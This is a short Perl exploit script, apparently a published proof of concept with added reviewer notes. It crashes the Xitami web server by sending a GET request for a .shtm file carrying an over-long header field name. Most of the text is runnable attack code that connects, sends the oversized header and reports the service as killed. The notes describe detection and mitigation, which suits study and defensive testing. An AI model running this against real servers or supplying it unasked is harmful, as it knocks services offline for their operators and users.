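#!/usr/local/bin/perl
#
# Simple exploit for Imatix Xitami Webserver on Windows NT
#
# Sending a GET request for a *.shtm file with a header field of >= 5154
# bytes, followed by a ":",
# will crash the service.
#
# Vulnerable versions:
# - Xitami 2.5B4 (bw3225b4.exe)
# - Xitami 2.5B4 (bs3225b4.exe)
# - Xitami 2.4D9 (bw3224d9.exe)
# - others?
#
# For legal purposes only !
#
# 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de
#
# Reviewer notes:
# - Impact as described above is loss of availability: the service stops
#   answering. Nothing in this script shows any effect beyond that.
# - Detection: a request header line whose field name runs to several
#   kilobytes is not something ordinary HTTP clients send. Logging or alerting
#   on header lines above a modest length catches this request.
# - Mitigation: this page names no fixed release, so check the vendor's
#   advisories. Independently of the server build, a front-end proxy that
#   rejects over-long header lines stops the request reaching the *.shtm
#   handler.

use strict;
use warnings;
use IO::Socket;

# Target of the check; the script as published points at the local host.
my $ip   = "127.0.0.1";
my $port = 80;

# Header field name: 5157 bytes, just above the 5154-byte threshold given in
# the description above.
my $var = "A" x 5157;

# The constructor returns undef when the connection cannot be made. Without
# this check the autoflush call below fails with an unrelated "can't call
# method on undefined value" error and hides the real cause.
# NOTE(review): Timeout bounds connection setup here; the read further down
# has no time limit of its own, so confirm how it behaves against a hung server.
my $mySocket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $ip,
    PeerPort => $port,
    Timeout  => 5,
) or die "Cannot connect to $ip:$port: $@\n";
$mySocket->autoflush(1);

# One request: the request line, then a single header line consisting of the
# long field name, a colon and a value, then the blank line ending the headers.
print $mySocket "GET /test.shtm HTTP/1.0\r\n" . $var . ": */*\r\n\r\n";

# Read everything the server sends until it closes the connection.
my @answer = <$mySocket>;
close $mySocket;

# An empty reply is the only crash indicator this script has. It cannot tell
# a dead service from a server that closed the connection without answering,
# so confirm the result by checking the service state on the host.
my $length = @answer;
if ($length == 0) {
    die "\nService killed!\n";
}
print @answer;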